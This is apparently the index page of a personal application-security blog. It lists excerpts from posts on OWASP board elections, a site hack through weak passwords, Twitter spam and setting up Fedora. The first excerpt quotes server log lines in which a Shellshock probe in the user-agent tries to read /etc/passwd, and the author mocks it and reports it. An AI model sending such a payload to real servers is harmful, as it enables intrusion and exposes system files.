85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1” 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd” 85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1” 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd” Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.
Author: vanderaj
Standing for the OWASP Board
I have formally submitted my name to be in the Board Elections 2014. I am standing for: Reforming the Board. We need to improve the independence, ethics and dispute resolution processes. I will be a root and branches reformer to encourage the Board to make a couple of the positions available to truly independent directors….
So it’s finally happened
Passwords. Pah. After running my blog on various virtual hosts and VPSs since 1998, my measures put into place to protect this site and the others on here were insufficient to protect against weak passwords. Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational…
AppSec EU – DevGuide all day working party! Be a part of it!
Be a part of the upcoming AppSec EU in Cambridge! * UPDATE! Eoin can’t be in two places at once, so our hack-a-thon has moved to Tuesday 24 June. Same room, same bat channel. * Eoin Keary and myself will be running an all day working party on the Developer Guide On June 24…
Stop. Just stop.
In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real”…
So your Twitter has been hacked. Now what?
So I’m getting a lot of Twitter spam with links to install bad crap on my computer. More than just occasionally, these DM’s are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions. So what do you need to do? Simple. Follow these basic NIST…
El Reg and the troubling case of climate denialism
This post is a last resort as I’ve had two comments rejected by the moderators at The Register, one of my favorite IT news websites. Lewis Page is a regular contributor to the Register. For whatever reason, around 50% of his total output there is (willful mis-) reporting on various papers and research on climate…
Infosec apostasy
I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security: Those who aim via various usual suspects to protect things Those who aim via various often…
Marketing – first against the wall when the revolution comes
A colleague of mine just received one of those awful marketing calls where the vendor rings *you* and demands your personal information “for privacy reasons” before continuing with the phone call. *Click* As a consumer, you must hang up to avoid being scammed. End of story. No exceptions. Even if the business has a relationship…
Update on Fedora 18 on VMWare Fusion 5.0.3
Everything now works. The quick version is: Create a new Fedora 18 VM Do not use “Easy install” Disable 3D acceleration in the VM settings (Command-E) prior to starting the install, otherwise you get a spinning idle cursor and no action upon first boot Install as you see fit. I use a 64 bit…